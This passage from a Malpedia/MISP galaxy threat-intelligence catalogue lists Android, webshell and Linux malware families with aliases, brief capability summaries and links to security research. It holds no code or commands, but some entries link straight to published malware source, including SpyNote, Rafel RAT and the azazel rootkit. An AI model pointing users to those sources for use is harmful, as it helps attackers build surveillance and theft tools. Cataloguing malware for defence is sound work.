The tag is: misp-galaxy:malpedia="Medusa (Android)"

Medusa (Android) is also known as:

  • Gorgona

Table 2164. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.medusa

https://www.threatfabric.com/blogs/partners-in-crime-medusa-cabassous.html

https://twitter.com/ThreatFabric/status/1285144962695340032

https://www.threatfabric.com/blogs/the-rage-of-android-banking-trojans.html

MobileOrder

Check Point has identified samples of this spyware being distributed since 2015. No samples were found on Google Play, so they were likely distributed through other channels such as social engineering.

The tag is: misp-galaxy:malpedia="MobileOrder"

MobileOrder is also known as:

Table 2166. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.mobile_order

https://research.checkpoint.com/2022/never-truly-left-7-years-of-scarlet-mimics-mobile-surveillance-campaign-targeting-uyghurs/

Monokle

Monokle is a sophisticated mobile surveillanceware that possesses remote access trojan (RAT) functionality, advanced data exfiltration techniques, and the ability to install an attacker-specified certificate into the trusted certificate store of an infected device, which would allow man-in-the-middle (MITM) attacks on its TLS traffic. According to Lookout researchers, it is believed to be developed by Special Technology Center (STC), a Russian defense contractor sanctioned by the U.S. Government in connection with alleged interference in the 2016 US presidential election.

The tag is: misp-galaxy:malpedia="Monokle"

Monokle is also known as:

Table 2167. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.monokle

https://www.lookout.com/documents/threat-reports/lookout-discovers-monokle-threat-report.pdf

MoqHao

The tag is: misp-galaxy:malpedia="MoqHao"

MoqHao is also known as:

  • Shaoye

  • XLoader

Table 2168. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.moqhao

https://www.xanhacks.xyz/p/moqhao-malware-analysis

https://cryptax.medium.com/a-native-packer-for-android-moqhao-6362a8412fe1

https://securelist.com/roaming-mantis-part-v/96250/

https://team-cymru.com/blog/2021/08/11/moqhao-part-1-5-high-level-trends-of-recent-campaigns-targeting-japan/

https://www.telekom.com/en/blog/group/article/moqhao-masters-new-tricks-1031484

https://www.team-cymru.com/post/moqhao-part-3-recent-global-targeting-trends

https://www.trendmicro.com/en_us/research/18/k/a-look-into-the-connection-between-xloader-and-fakespy-and-their-possible-ties-with-the-yanbian-gang.html

https://blog.trendmicro.com/trendlabs-security-intelligence/a-look-into-the-connection-between-xloader-and-fakespy-and-their-possible-ties-with-the-yanbian-gang/

https://team-cymru.com/blog/2022/04/07/moqhao-part-2-continued-european-expansion/

https://securelist.com/roaming-mantis-dns-changer-in-malicious-mobile-app/108464/

https://blog.sekoia.io/ongoing-roaming-mantis-smishing-campaign-targeting-france/

https://medium.com/csis-techblog/the-roamingmantis-groups-expansion-to-european-apple-accounts-and-android-devices-e6381723c681

https://hitcon.org/2019/CMT/slide-files/d2_s1_r1.pdf

https://www.kashifali.ca/2021/05/05/roaming-mantis-amplifies-smishing-campaign-with-os-specific-android-malware/

https://team-cymru.com/blog/2021/01/20/moqhao-part-1-identifying-phishing-infrastructure/

https://www.trendmicro.com/en_us/research/18/d/xloader-android-spyware-and-banking-trojan-distributed-via-dns-spoofing.html

https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_4_ogawa-niseki_en.pdf

MOrder RAT

The tag is: misp-galaxy:malpedia="MOrder RAT"

MOrder RAT is also known as:

Table 2169. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.morder_rat

https://www.ctfiot.com/138538.html

Mudwater

The tag is: misp-galaxy:malpedia="Mudwater"

Mudwater is also known as:

Table 2170. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.mudwater

https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf

MysteryBot

MysteryBot is an Android banking Trojan with overlay capabilities that work on Android 7 and 8; it also provides other features such as keylogging and ransomware functionality.

The tag is: misp-galaxy:malpedia="MysteryBot"

MysteryBot is also known as:

Table 2171. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.mysterybot

https://www.threatfabric.com/blogs/mysterybota_new_android_banking_trojan_ready_for_android_7_and_8.html

PackChat

The tag is: misp-galaxy:malpedia="PackChat"

PackChat is also known as:

Table 2175. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.packchat

https://news.sophos.com/en-us/2021/01/12/new-android-spyware-targets-users-in-pakistan/

PhoneSpy

According to Zimperium, PhoneSpy is a spyware aimed at South Korean residents with Android devices.

The tag is: misp-galaxy:malpedia="PhoneSpy"

PhoneSpy is also known as:

Table 2177. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.phonespy

https://blog.zimperium.com/phonespy-the-app-based-cyberattack-snooping-south-korean-citizens/

PINEFLOWER

According to Mandiant, PINEFLOWER is an Android malware family capable of a wide range of backdoor functionality, including stealing system information, logging and recording phone calls, initiating audio recordings, reading SMS inboxes and sending SMS messages. The malware also has features for device location tracking; deleting, downloading and uploading files; reading connectivity state, speed and activity; and toggling Bluetooth, Wi-Fi and mobile data settings.

The tag is: misp-galaxy:malpedia="PINEFLOWER"

PINEFLOWER is also known as:

Table 2178. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.pineflower

https://www.mandiant.com/media/17826

https://socradar.io/dark-web-profile-apt42-iranian-cyber-espionage-group/

PixPirate

According to PCrisk, PixPirate is a dangerous Android banking Trojan capable of carrying out ATS (Automatic Transfer System) attacks. This allows threat actors to transfer funds automatically through the Pix instant payment platform used by numerous Brazilian banks.

In addition to launching ATS attacks, PixPirate can intercept and delete SMS messages, prevent the uninstallation process, and carry out malvertising attacks.

The tag is: misp-galaxy:malpedia="PixPirate"

PixPirate is also known as:

Table 2179. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.pixpirate

https://www.cleafy.com/cleafy-labs/pixpirate-a-new-brazilian-banking-trojan

Podec

The tag is: misp-galaxy:malpedia="Podec"

Podec is also known as:

Table 2182. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.podec

https://securelist.com/jack-of-all-trades/83470/

Fake Pornhub

The tag is: misp-galaxy:malpedia="Fake Pornhub"

Fake Pornhub is also known as:

Table 2184. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.pornhub

Premier RAT

The tag is: misp-galaxy:malpedia="Premier RAT"

Premier RAT is also known as:

Table 2185. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.premier_rat

https://twitter.com/LukasStefanko/status/1084774825619537925

Rafel RAT

The tag is: misp-galaxy:malpedia="Rafel RAT"

Rafel RAT is also known as:

Table 2186. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.rafelrat

https://github.com/swagkarna/Rafel-Rat

Rana

The tag is: misp-galaxy:malpedia="Rana"

Rana is also known as:

Table 2188. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.rana

https://blog.reversinglabs.com/blog/rana-android-malware

RatMilad

RatMilad, a newly discovered Android spyware, has been stealing data from mobile devices in the Middle East. The malware is spread through links on social media and pretends to be applications for services like VPN and phone number spoofing. Unwary users download these trojan applications and grant access to malware.

The tag is: misp-galaxy:malpedia="RatMilad"

RatMilad is also known as:

Table 2189. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.ratmilad

https://socradar.io/new-spyware-ratmilad-targets-middle-eastern-mobile-devices

Raxir

The tag is: misp-galaxy:malpedia="Raxir"

Raxir is also known as:

Table 2190. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.raxir

https://twitter.com/PhysicalDrive0/statuses/798825019316916224

RedAlert2

RedAlert 2 is a new Android malware used to obtain login credentials for various e-banking apps. The malware overlays the legitimate login screen with a fake one that sends the entered credentials to a C2 server. It can also block incoming calls from banks, to prevent the victim from being notified. As a distribution vector RedAlert 2 uses third-party app stores and imitates real Android apps such as Viber and WhatsApp, or poses as a fake Adobe Flash Player update.

The tag is: misp-galaxy:malpedia="RedAlert2"

RedAlert2 is also known as:

Table 2191. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.redalert2

https://www.threatfabric.com/blogs/new_android_trojan_targeting_over_60_banks_and_social_apps.html

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/red-alert-2-0-android-trojan-spreads-via-third-party-app-stores

RemRAT

The tag is: misp-galaxy:malpedia="RemRAT"

RemRAT is also known as:

Table 2192. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.remrat

https://blogs.360.cn/post/analysis-of-RemRAT.html

Retefe (Android)

The Android app used by Retefe is an SMS stealer that forwards mTAN codes to the threat actor. A bank logo is added to the Android app to trick users into thinking it is legitimate. Moreover, if the visitor is not a targeted victim, the download link does not serve the malicious APK but the real 'Signal Private Messenger' app, so that phone does not get infected.

The tag is: misp-galaxy:malpedia="Retefe (Android)"

Retefe (Android) is also known as:

Table 2193. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.retefe

http://blog.angelalonso.es/2015/10/reversing-c2c-http-emmental.html

http://blog.angelalonso.es/2015/11/reversing-sms-c-protocol-of-emmental.html

http://blog.angelalonso.es/2017/02/hunting-retefe-with-splunk-some24.html

http://maldr0id.blogspot.ch/2014/09/android-malware-based-on-sms-encryption.html

https://www.govcert.admin.ch/blog/33/the-retefe-saga

http://blog.dornea.nu/2014/07/07/disect-android-apks-like-a-pro-static-code-analysis/

Revive

According to PCrisk, Revive is the name of a banking Trojan targeting Android users (customers of a specific Spanish bank). It steals sensitive information. Cybercriminals use Revive to take ownership of online accounts using stolen login credentials. This malware abuses Accessibility Services to perform malicious activities.

The tag is: misp-galaxy:malpedia="Revive"

Revive is also known as:

Table 2194. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.revive

https://www.cleafy.com/cleafy-labs/revive-from-spyware-to-android-banking-trojan

Sauron Locker

The tag is: misp-galaxy:malpedia="Sauron Locker"

Sauron Locker is also known as:

Table 2199. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.sauron_locker

https://twitter.com/LukasStefanko/status/1117795290155819008

SideWinder (Android)

SideWinder involved a fake VPN app for Android devices published on Google Play Store along with a custom tool that filters victims for better targeting.

The tag is: misp-galaxy:malpedia="SideWinder (Android)"

SideWinder (Android) is also known as:

Table 2201. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.sidewinder

https://ti.qianxin.com/blog/articles/analysis-of-malware-android-software-spread-by-sidewinder-using-google-play/

https://www.group-ib.com/blog/hunting-sidewinder/

SilkBean

The tag is: misp-galaxy:malpedia="SilkBean"

SilkBean is also known as:

Table 2202. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.silkbean

https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf

Skygofree

The tag is: misp-galaxy:malpedia="Skygofree"

Skygofree is also known as:

Table 2203. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.skygofree

https://securelist.com/skygofree-following-in-the-footsteps-of-hackingteam/83603/

SMSspy

The tag is: misp-galaxy:malpedia="SMSspy"

SMSspy is also known as:

Table 2207. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.smsspy

SpyC23

The tag is: misp-galaxy:malpedia="SpyC23"

SpyC23 is also known as:

Table 2210. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.spyc23

https://www.welivesecurity.com/2020/09/30/aptc23-group-evolves-its-android-spyware/

SpyNote

The malware has been released on GitHub at https://github.com/EVLF/Cypher-Rat-Source-Code

The tag is: misp-galaxy:malpedia="SpyNote"

SpyNote is also known as:

  • CypherRat

Table 2212. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.spynote

https://ti.qianxin.com/blog/articles/Blade-hawk-The-activities-of-targeted-the-Middle-East-and-West-Asia-are-exposed/

https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/

https://www.cleafy.com/cleafy-labs/spynote-continues-to-attack-financial-institutions

https://www.threatfabric.com/blogs/spynote-rat-targeting-financial-institutions

https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.hcd1wvpsrgfr

https://www.threatfabric.com/blogs/spynote-rat-targeting-financial-institutions.html

https://www.civilsphereproject.org/blog/2021/9/21/capturing-and-detecting-androidtester-remote-access-trojan-with-the-emergency-vpn

https://www.bleepingcomputer.com/news/security/spynote-android-malware-infections-surge-after-source-code-leak/

https://www.volexity.com/blog/2020/03/31/storm-cloud-unleashed-tibetan-community-focus-of-highly-targeted-fake-flash-campaign/

https://labs.k7computing.com/index.php/spynote-targets-irctc-users/

https://mp.weixin.qq.com/s/J_A12SOX0k5TOYFAegBv_w

https://labs.k7computing.com/index.php/spynote-an-android-snooper/

https://bulldogjob.pl/articles/1200-an-in-depth-analysis-of-spynote-remote-access-trojan

https://mp.weixin.qq.com/s/mstwBMkS0G3Et4GOji2mwA

https://about.fb.com/news/2021/04/taking-action-against-hackers-in-palestine/

StealthAgent

The tag is: misp-galaxy:malpedia="StealthAgent"

StealthAgent is also known as:

Table 2213. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.stealthagent

https://www.amnesty.org/download/Documents/ASA3383662018ENGLISH.PDF

Stealth Mango

The tag is: misp-galaxy:malpedia="Stealth Mango"

Stealth Mango is also known as:

Table 2214. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.stealthmango

https://www.lookout.com/info/stealth-mango-report-ty

https://www.lookout.com/blog/stealth-mango

Switcher

The tag is: misp-galaxy:malpedia="Switcher"

Switcher is also known as:

Table 2216. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.switcher

https://securelist.com/blog/mobile/76969/switcher-android-joins-the-attack-the-router-club/

TangleBot

The tag is: misp-galaxy:malpedia="TangleBot"

TangleBot is also known as:

Table 2218. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.tangle_bot

https://www.proofpoint.com/us/blog/threat-insight/mobile-malware-tanglebot-untangled

TemptingCedar Spyware

The tag is: misp-galaxy:malpedia="TemptingCedar Spyware"

TemptingCedar Spyware is also known as:

Table 2220. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.tempting_cedar

https://blog.avast.com/avast-tracks-down-tempting-cedar-spyware

TianySpy

According to Trend Micro, this malware appears to have been designed to steal credentials associated with membership websites of major Japanese telecommunication services.

The tag is: misp-galaxy:malpedia="TianySpy"

TianySpy is also known as:

Table 2222. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.tianyspy

https://www.trendmicro.com/en_us/research/22/a/tianyspy-malware-uses-smishing-disguised-as-message-from-telco.html

TinyZ

The tag is: misp-galaxy:malpedia="TinyZ"

TinyZ is also known as:

  • Catelites Android Bot

  • MarsElite Android Bot

Table 2223. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.tinyz

http://blog.group-ib.com/cron

Triout

Bitdefender described Triout as an Android spyware, which appears to act as a framework for building extensive surveillance capabilities into seemingly benign applications. Found bundled with a repackaged app, the spyware’s surveillance capabilities involve hiding its presence on the device, recording phone calls, logging incoming text messages, recording videos, taking pictures and collecting GPS coordinates, then broadcasting all of that to an attacker-controlled C&C (command and control) server.

The tag is: misp-galaxy:malpedia="Triout"

Triout is also known as:

Table 2226. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.triout

UltimaSMS

The tag is: misp-galaxy:malpedia="UltimaSMS"

UltimaSMS is also known as:

Table 2227. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.ultima_sms

https://blog.avast.com/premium-sms-scam-apps-on-play-store-avast

Unidentified APK 001

The tag is: misp-galaxy:malpedia="Unidentified APK 001"

Unidentified APK 001 is also known as:

Table 2228. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.unidentified_001

https://www.welivesecurity.com/2017/02/14/new-android-trojan-mimics-user-clicks-download-dangerous-malware/

Unidentified APK 002

The tag is: misp-galaxy:malpedia="Unidentified APK 002"

Unidentified APK 002 is also known as:

Table 2229. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.unidentified_002

Unidentified APK 004

According to Check Point Research, this is a RAT that is disguised as a set of dating apps like "GrixyApp", "ZatuApp", "Catch&See", including dedicated websites to conceal their malicious purpose.

The tag is: misp-galaxy:malpedia="Unidentified APK 004"

Unidentified APK 004 is also known as:

Table 2230. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.unidentified_004

https://research.checkpoint.com/2020/hamas-android-malware-on-idf-soldiers-this-is-how-it-happened/

Unidentified APK 005

The tag is: misp-galaxy:malpedia="Unidentified APK 005"

Unidentified APK 005 is also known as:

Table 2231. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.unidentified_005

Unidentified 007 (ARMAAN RAT)

According to Cyble, this is an Android application that pretends to be the legitimate application for the Army Mobile Aadhaar App Network (ARMAAN), intended to be used by Indian army personnel. The application was customized to include RAT functionality.

The tag is: misp-galaxy:malpedia="Unidentified 007 (ARMAAN RAT)"

Unidentified 007 (ARMAAN RAT) is also known as:

Table 2233. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.unidentified_007

https://blog.cyble.com/2022/01/28/indian-army-personnel-face-remote-access-trojan-attacks/

Unidentified APK 008

Android malware distributed through fake shopping websites, targeting Malaysian users and their banking information.

The tag is: misp-galaxy:malpedia="Unidentified APK 008"

Unidentified APK 008 is also known as:

Table 2234. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.unidentified_008

https://www.welivesecurity.com/2022/04/06/fake-eshops-prowl-banking-credentials-android-malware/

vamp

Related to the Micropsia Windows malware and also sometimes named Micropsia.

The tag is: misp-galaxy:malpedia="vamp"

vamp is also known as:

  • android.micropsia

Table 2236. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.vamp

https://unit42.paloaltonetworks.com/unit42-targeted-attacks-middle-east-using-kasperagent-micropsia/

VINETHORN

According to Mandiant, VINETHORN is an Android malware family capable of a wide range of backdoor functionality. It can steal system information, read SMS inboxes, send SMS messages, access contact lists and call histories, record audio and video, and track device location via GPS.

The tag is: misp-galaxy:malpedia="VINETHORN"

VINETHORN is also known as:

Table 2237. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.vinethorn

https://www.mandiant.com/media/17826

https://socradar.io/dark-web-profile-apt42-iranian-cyber-espionage-group/

Wroba

According to Avira, this is a banking trojan targeting Japan.

The tag is: misp-galaxy:malpedia="Wroba"

Wroba is also known as:

Table 2242. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.wroba

https://securelist.com/roaming-mantis-reaches-europe/105596/

https://www.avira.com/en/blog/the-android-banking-trojan-wroba-shifts-attack-from-south-korea-to-target-users-in-japan

xHelper

The tag is: misp-galaxy:malpedia="xHelper"

xHelper is also known as:

Table 2246. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.xhelper

https://securelist.com/unkillable-xhelper-and-a-trojan-matryoshka/96487/

XploitSPY

The tag is: misp-galaxy:malpedia="XploitSPY"

XploitSPY is also known as:

Table 2247. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.xploitspy

https://twitter.com/malwrhunterteam/status/1249768400806653952

YellYouth

The tag is: misp-galaxy:malpedia="YellYouth"

YellYouth is also known as:

Table 2249. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.yellyouth

https://www.mulliner.org/blog/blosxom.cgi/security/yellyouth_android_malware.html

Zanubis

According to Cyware, Zanubis malware pretends to be a malicious PDF application. The threat actor uses it as a key to decrypt responses received from the C2 server.

The tag is: misp-galaxy:malpedia="Zanubis"

Zanubis is also known as:

Table 2250. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.zanubis

https://labs.k7computing.com/index.php/an-upsurge-of-new-android-banking-trojan-zanubis/

Zen

The tag is: misp-galaxy:malpedia="Zen"

Zen is also known as:

Table 2251. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.zen

https://security.googleblog.com/2019/01/pha-family-highlights-zen-and-its.html

Nightrunner

WebShell.

The tag is: misp-galaxy:malpedia="Nightrunner"

Nightrunner is also known as:

Table 2254. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/asp.nightrunner

https://securelist.com/defttorero-tactics-techniques-and-procedures/107610/

TwoFace

According to Unit42, TwoFace is a two-staged (loader+payload) webshell, written in C# and meant to run on webservers with ASP.NET. The author of the initial loader webshell included legitimate and expected content that will be displayed if a visitor accesses the shell in a browser, likely to remain undetected. The code in the loader webshell includes obfuscated variable names and the embedded payload is encoded and encrypted. To interact with the loader webshell, the threat actor uses HTTP POST requests to the compromised server.

The secondary webshell, which we call the payload, is embedded within the loader in encrypted form and contains additional functionality that we will discuss in further detail. When the threat actor wants to interact with the remote server, they provide data that the loader will use to modify a decryption key embedded within the loader, which is in turn used to decrypt the embedded TwoFace payload. Commands supported by the payload are execution of programs, upload, download and deletion of files, and the capability to manipulate MAC timestamps.

The tag is: misp-galaxy:malpedia="TwoFace"

TwoFace is also known as:

  • HighShell

  • HyperShell

  • Minion

  • SEASHARPEE

Table 2256. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/asp.twoface

https://www.zdnet.com/article/source-code-of-iranian-cyber-espionage-tools-leaked-on-telegram/

https://unit42.paloaltonetworks.com/unit42-oilrig-performs-tests-twoface-webshell/

https://drive.google.com/file/d/1oA4YSwXLxEF-EXJcrM76Bc4_7ZfBGYE4/view

https://web.archive.org/web/20200307113010/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947864.pdf

https://www.secureworks.com/research/threat-profiles/cobalt-gypsy

https://www.cyber.gov.au/sites/default/files/2020-06/ACSC-Advisory-2020-008-Copy-Paste-Compromises.pdf

https://unit42.paloaltonetworks.com/unit42-twoface-webshell-persistent-access-point-lateral-movement/

https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1536345486.pdf

https://www.youtube.com/watch?time_continue=1333&v=1CGAmjAV8nI

https://go.recordedfuture.com/hubfs/reports/cta-2020-0312.pdf

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/

https://www.recordedfuture.com/full-spectrum-detections-five-popular-web-shells/

https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae

https://unit42.paloaltonetworks.com/atoms/evasive-serpens/

https://www.youtube.com/watch?v=GjquFKa4afU

Unidentified ASP 001 (Webshell)

The tag is: misp-galaxy:malpedia="Unidentified ASP 001 (Webshell)"

Unidentified ASP 001 (Webshell) is also known as:

Table 2257. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/asp.unidentified_001

Abcbot

Abcbot is a modular Go-based botnet and malware that propagates via exploits and brute force attempts. The botnet was observed launching DDoS attacks, performing internet scans, and serving web pages. It is probably linked to a Xanthe-based clipjacking campaign.

The tag is: misp-galaxy:malpedia="Abcbot"

Abcbot is also known as:

Table 2258. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.abcbot

https://www.cadosecurity.com/abcbot-an-evolution-of-xanthe/

https://blog.netlab.360.com/abcbot_an_evolving_botnet_en/

https://www.cadosecurity.com/the-continued-evolution-of-abcbot/

https://www.lacework.com/blog/abc-botnet-attacks-on-the-rise/

Abyss Locker

Family based on HelloKitty Ransomware. Encryption algorithm changed from AES to ChaCha. Sample seems to be unpacked.

The tag is: misp-galaxy:malpedia="Abyss Locker"

Abyss Locker is also known as:

  • elf.hellokitty

Table 2259. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.abyss

https://www.bleepingcomputer.com/news/security/linux-version-of-abyss-locker-ransomware-targets-vmware-esxi-servers/

ACBackdoor (ELF)

A Linux backdoor that was apparently ported to Windows. This entry represents the Linux version. This version appears to have been written first and the Windows version was ported later, without full functionality. The Linux version offers persistence as well as some process manipulation techniques, though both versions apparently offer the ability to access the command line and execute programs as well as self-update.

The tag is: misp-galaxy:malpedia="ACBackdoor (ELF)"

ACBackdoor (ELF) is also known as:

Table 2260. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.acbackdoor

https://medium.com/@Ilandu/portdoor-malware-afc9d0796cba

https://www.bleepingcomputer.com/news/security/linux-windows-users-targeted-with-new-acbackdoor-malware/

https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf

AirDropBot

AirDropBot is used to create a DDoS botnet. It spreads as a worm, currently targeting Linksys routers. Backdoor and other bot functionality is present in this family. Development seems to be ongoing.

The tag is: misp-galaxy:malpedia="AirDropBot"

AirDropBot is also known as:

  • CloudBot

Table 2263. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.airdrop

https://blog.malwaremustdie.org/2019/09/mmd-0064-2019-linuxairdropbot.html

Aisuru

Honeypot-aware variant of Mirai.

The tag is: misp-galaxy:malpedia="Aisuru"

Aisuru is also known as:

Table 2264. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.aisuru

https://insights.oem.avira.com/new-mirai-variant-aisuru-detects-cowrie-opensource-honeypots/

Akira (ELF)

Ransomware

The tag is: misp-galaxy:malpedia="Akira (ELF)"

Akira (ELF) is also known as:

Table 2265. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.akira

https://labs.k7computing.com/index.php/akiras-play-with-linux/

AVrecon

AVrecon is a Linux-based Remote Access Trojan (RAT) targeting small-office/home-office (SOHO) routers and other ARM-embedded devices. The malware is distributed via exploitation of unpatched vulnerabilities or common misconfiguration of the targeted devices. Once deployed, AVrecon will collect some information about the infected device, open a session to a pre-configured C&C server, and spawn a remote shell for command execution. It might also download additional arbitrary files and run them. The malware has recently been used in campaigns aimed at ad-fraud activities, password spraying and data exfiltration.

The tag is: misp-galaxy:malpedia="AVrecon"

AVrecon is also known as:

Table 2269. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.avrecon

https://spur.us/2023/07/christmas-in-july-a-finely-wrapped-proxy-service/

https://twitter.com/BlackLotusLabs/status/1684290046235484160

https://krebsonsecurity.com/2023/07/who-and-what-is-behind-the-malware-proxy-service-socksescort/

https://blog.lumen.com/routers-from-the-underground-exposing-avrecon/

azazel

Azazel is a Linux user-mode rootkit based on the LD_PRELOAD technique used by the Jynx rootkit. Azazel is purportedly more robust than Jynx and has many more anti-analysis features.

The tag is: misp-galaxy:malpedia="azazel"

azazel is also known as:

Table 2270. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.azazel

https://github.com/chokepoint/azazel

B1txor20

B1txor20 is a malware that was discovered by 360 Netlab along with others exploiting Log4J. The name is derived from the file name "b1t", the XOR encryption algorithm, and the RC4 algorithm key length of 20 bytes. According to 360 Netlab, this backdoor for the Linux platform uses DNS tunneling to build a C2 communication channel. They also assumed that the malware is still in development, because of some bugs and not fully implemented features.

The tag is: misp-galaxy:malpedia="B1txor20"

B1txor20 is also known as:

Table 2271. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.b1txor20

https://blog.netlab.360.com/b1txor20-use-of-dns-tunneling_cn/

Babuk (ELF)

ESX and NAS modules for Babuk ransomware.

The tag is: misp-galaxy:malpedia="Babuk (ELF)"

Babuk (ELF) is also known as:

Table 2272. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.babuk

https://medium.com/s2wlab/blackmatter-x-babuk-using-the-same-web-server-for-sharing-leaked-files-d01c20a74751

https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/

https://raw.githubusercontent.com/antonioCoco/infosec-talks/main/InsomniHack_2022_Ransomware_Encryption_Internals.pdf

https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf

https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/

https://medium.com/s2wlab/grooves-thoughts-on-blackmatter-babuk-and-interruption-in-the-supply-of-cheese-in-the-b5328bc764f2

https://www.advintel.io/post/groove-vs-babuk-groove-ransom-manifesto-ramp-underground-platform-secret-inner-workings

https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/how-groove-gang-is-shaking-up-the-ransomware-as-a-service-market-to-empower-affiliates/

https://marcoramilli.com/2021/07/05/babuk-ransomware-the-builder/

https://krebsonsecurity.com/2023/05/russian-hacker-wazawaka-indicted-for-ransomware/

https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html

https://medium.com/s2wlab/groove-x-ramp-the-relation-between-groove-babuk-ramp-and-blackmatter-f75644f8f92d

Backdoorit

According to Avast Decoded, Backdoorit is a multiplatform RAT written in the Go programming language and supporting both Windows and Linux/Unix operating systems. In many places in the code it is also referred to as backd00rit.

The tag is: misp-galaxy:malpedia="Backdoorit"

Backdoorit is also known as:

  • backd00rit

Table 2273. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.backdoorit

https://decoded.avast.io/davidalvarez/go-malware-on-the-rise/

Irc16

The tag is: misp-galaxy:malpedia="Irc16"

Irc16 is also known as:

Table 2274. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.backdoor_irc16

https://news.drweb.com/show/?c=5&i=10193&lng=en

BADCALL (ELF)

BADCALL is a Trojan malware variant used by the Lazarus Group.

The tag is: misp-galaxy:malpedia="BADCALL (ELF)"

BADCALL (ELF) is also known as:

Table 2275. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.badcall

https://www.welivesecurity.com/2023/04/20/linux-malware-strengthens-links-lazarus-3cx-supply-chain-attack

Bashlite

